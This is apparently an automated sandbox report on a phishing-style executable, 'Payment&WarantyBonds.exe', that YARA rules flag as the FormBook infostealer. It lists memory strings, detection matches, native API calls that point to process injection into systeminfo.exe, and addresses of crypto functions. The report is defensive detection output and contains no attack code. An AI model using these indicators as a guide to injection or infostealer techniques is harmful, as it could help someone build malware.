Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/cloudhost/
Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/jiaoyi/
Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/domain/
Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/mail/
Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/webhosting/
Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/ykj/view.asp?domain=cotti.club

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment&WarantyBonds.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D2294 NtQueryInformationProcess,	0_2_066D2294
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D6308 NtQueryInformationProcess,	0_2_066D6308
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0042C483 NtClose,	2_2_0042C483
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842B60 NtClose,LdrInitializeThunk,	2_2_01842B60
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01842DF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01842C70
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018435C0 NtCreateMutant,LdrInitializeThunk,	2_2_018435C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01844340 NtSetContextThread,	2_2_01844340
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01844650 NtSuspendThread,	2_2_01844650
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842B80 NtQueryInformationFile,	2_2_01842B80
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842BA0 NtEnumerateValueKey,	2_2_01842BA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842BE0 NtQueryValueKey,	2_2_01842BE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842BF0 NtAllocateVirtualMemory,	2_2_01842BF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842AB0 NtWaitForSingleObject,	2_2_01842AB0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842AD0 NtReadFile,	2_2_01842AD0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842AF0 NtWriteFile,	2_2_01842AF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842DB0 NtEnumerateKey,	2_2_01842DB0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842DD0 NtDelayExecution,	2_2_01842DD0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842D00 NtSetInformationFile,	2_2_01842D00
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842D10 NtMapViewOfSection,	2_2_01842D10
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842D30 NtUnmapViewOfSection,	2_2_01842D30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842CA0 NtQueryInformationToken,	2_2_01842CA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842CC0 NtQueryVirtualMemory,	2_2_01842CC0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842CF0 NtOpenProcess,	2_2_01842CF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842C00 NtQueryInformationProcess,	2_2_01842C00
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842C60 NtCreateKey,	2_2_01842C60
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842F90 NtProtectVirtualMemory,	2_2_01842F90
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842FA0 NtQuerySection,	2_2_01842FA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842FB0 NtResumeThread,	2_2_01842FB0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842FE0 NtCreateFile,	2_2_01842FE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842F30 NtCreateSection,	2_2_01842F30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842F60 NtCreateProcessEx,	2_2_01842F60
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842E80 NtReadVirtualMemory,	2_2_01842E80
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842EA0 NtAdjustPrivilegesToken,	2_2_01842EA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842EE0 NtQueueApcThread,	2_2_01842EE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01842E30 NtWriteVirtualMemory,	2_2_01842E30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01843090 NtSetValueKey,	2_2_01843090
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01843010 NtOpenDirectoryObject,	2_2_01843010
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018439B0 NtGetContextThread,	2_2_018439B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01843D10 NtOpenProcessToken,	2_2_01843D10
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01843D70 NtOpenThread,	2_2_01843D70
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04724650 NtSuspendThread,LdrInitializeThunk,	7_2_04724650
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04724340 NtSetContextThread,LdrInitializeThunk,	7_2_04724340
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_04722C70
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722C60 NtCreateKey,LdrInitializeThunk,	7_2_04722C60
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_04722CA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_04722D30
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_04722D10
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_04722DF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722DD0 NtDelayExecution,LdrInitializeThunk,	7_2_04722DD0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_04722EE0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_04722E80
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722F30 NtCreateSection,LdrInitializeThunk,	7_2_04722F30
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722FE0 NtCreateFile,LdrInitializeThunk,	7_2_04722FE0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722FB0 NtResumeThread,LdrInitializeThunk,	7_2_04722FB0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722AF0 NtWriteFile,LdrInitializeThunk,	7_2_04722AF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722AD0 NtReadFile,LdrInitializeThunk,	7_2_04722AD0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722B60 NtClose,LdrInitializeThunk,	7_2_04722B60
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_04722BF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_04722BE0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_04722BA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047235C0 NtCreateMutant,LdrInitializeThunk,	7_2_047235C0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047239B0 NtGetContextThread,LdrInitializeThunk,	7_2_047239B0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722C00 NtQueryInformationProcess,	7_2_04722C00
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722CF0 NtOpenProcess,	7_2_04722CF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722CC0 NtQueryVirtualMemory,	7_2_04722CC0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722D00 NtSetInformationFile,	7_2_04722D00
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722DB0 NtEnumerateKey,	7_2_04722DB0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722E30 NtWriteVirtualMemory,	7_2_04722E30
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722EA0 NtAdjustPrivilegesToken,	7_2_04722EA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722F60 NtCreateProcessEx,	7_2_04722F60
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722FA0 NtQuerySection,	7_2_04722FA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722F90 NtProtectVirtualMemory,	7_2_04722F90
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722AB0 NtWaitForSingleObject,	7_2_04722AB0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04722B80 NtQueryInformationFile,	7_2_04722B80
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04723010 NtOpenDirectoryObject,	7_2_04723010
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04723090 NtSetValueKey,	7_2_04723090
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04723D70 NtOpenThread,	7_2_04723D70
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04723D10 NtOpenProcessToken,	7_2_04723D10
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005D8FE0 NtCreateFile,	7_2_005D8FE0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005D9140 NtReadFile,	7_2_005D9140
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005D9230 NtDeleteFile,	7_2_005D9230
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005D92D0 NtClose,	7_2_005D92D0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005D9440 NtAllocateVirtualMemory,	7_2_005D9440

Detected potential crypto function

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007AEF04	0_2_007AEF04
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_00C06BE0	0_2_00C06BE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_00C010A8	0_2_00C010A8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_00C02908	0_2_00C02908
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_00C00C70	0_2_00C00C70
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_00C02D40	0_2_00C02D40
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_00C007F8	0_2_00C007F8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D3658	0_2_066D3658
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D2388	0_2_066D2388
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D9E58	0_2_066D9E58
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D3649	0_2_066D3649
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D5720	0_2_066D5720
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D6490	0_2_066D6490
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D52E8	0_2_066D52E8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D2378	0_2_066D2378
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066DA0E8	0_2_066DA0E8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066DA0DA	0_2_066DA0DA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D9E48	0_2_066D9E48
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D8B40	0_2_066D8B40
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D8B31	0_2_066D8B31
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_066D5BE0	0_2_066D5BE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004184B3	2_2_004184B3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0040E053	2_2_0040E053
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00402196	2_2_00402196
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00401220	2_2_00401220
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0042EA83	2_2_0042EA83
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00402372	2_2_00402372
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00402380	2_2_00402380
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0040FDAA	2_2_0040FDAA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0040FDB3	2_2_0040FDB3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004026D2	2_2_004026D2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004026E0	2_2_004026E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004166EE	2_2_004166EE
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004166F3	2_2_004166F3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004166AC	2_2_004166AC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00402F10	2_2_00402F10
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0040FFD3	2_2_0040FFD3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018D01AA	2_2_018D01AA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C41A2	2_2_018C41A2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C81CC	2_2_018C81CC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01800100	2_2_01800100
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018AA118	2_2_018AA118
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01898158	2_2_01898158
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018A2000	2_2_018A2000
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018D03E6	2_2_018D03E6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0181E3F0	2_2_0181E3F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CA352	2_2_018CA352
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018902C0	2_2_018902C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018B0274	2_2_018B0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018D0591	2_2_018D0591
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01810535	2_2_01810535
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018BE4F6	2_2_018BE4F6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018B4420	2_2_018B4420
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C2446	2_2_018C2446
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0180C7C0	2_2_0180C7C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01834750	2_2_01834750
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01810770	2_2_01810770
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0182C6E0	2_2_0182C6E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018129A0	2_2_018129A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018DA9A6	2_2_018DA9A6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01826962	2_2_01826962
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0183E8F0	2_2_0183E8F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0181A840	2_2_0181A840
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01812840	2_2_01812840
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017F68B8	2_2_017F68B8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C6BD7	2_2_018C6BD7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CAB40	2_2_018CAB40
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0180EA80	2_2_0180EA80
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01828DBF	2_2_01828DBF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0180ADE0	2_2_0180ADE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0181AD00	2_2_0181AD00
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018ACD1F	2_2_018ACD1F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018B0CB5	2_2_018B0CB5
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01800CF2	2_2_01800CF2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01810C00	2_2_01810C00
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0188EFA0	2_2_0188EFA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01802FC8	2_2_01802FC8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01852F28	2_2_01852F28
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01830F30	2_2_01830F30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018B2F30	2_2_018B2F30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01884F40	2_2_01884F40
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01822E90	2_2_01822E90
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CCE93	2_2_018CCE93
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CEEDB	2_2_018CEEDB
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CEE26	2_2_018CEE26
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01810E59	2_2_01810E59
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017FF172	2_2_017FF172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0181B1B0	2_2_0181B1B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018DB16B	2_2_018DB16B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0184516C	2_2_0184516C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018170C0	2_2_018170C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018BF0CC	2_2_018BF0CC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C70E9	2_2_018C70E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CF0E0	2_2_018CF0E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0185739A	2_2_0185739A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017FD34C	2_2_017FD34C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C132D	2_2_018C132D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018152A0	2_2_018152A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0182B2C0	2_2_0182B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018B12ED	2_2_018B12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0182D2F0	2_2_0182D2F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018AD5B0	2_2_018AD5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018D95C3	2_2_018D95C3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C7571	2_2_018C7571
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CF43F	2_2_018CF43F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01801460	2_2_01801460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CF7B0	2_2_018CF7B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C16CC	2_2_018C16CC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01855630	2_2_01855630
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018A5910	2_2_018A5910
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01819950	2_2_01819950
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0182B950	2_2_0182B950
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018138E0	2_2_018138E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0187D800	2_2_0187D800
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0182FB80	2_2_0182FB80
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01885BF0	2_2_01885BF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0184DBF9	2_2_0184DBF9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CFB76	2_2_018CFB76
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01855AA0	2_2_01855AA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018ADAAC	2_2_018ADAAC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018B1AA3	2_2_018B1AA3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018BDAC6	2_2_018BDAC6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CFA49	2_2_018CFA49
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C7A46	2_2_018C7A46
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01883A6C	2_2_01883A6C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0182FDC0	2_2_0182FDC0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01813D40	2_2_01813D40
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C1D5A	2_2_018C1D5A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018C7D73	2_2_018C7D73
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CFCF2	2_2_018CFCF2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01889C32	2_2_01889C32
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01811F92	2_2_01811F92
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CFFB1	2_2_018CFFB1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018CFF09	2_2_018CFF09
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017D3FD5	2_2_017D3FD5
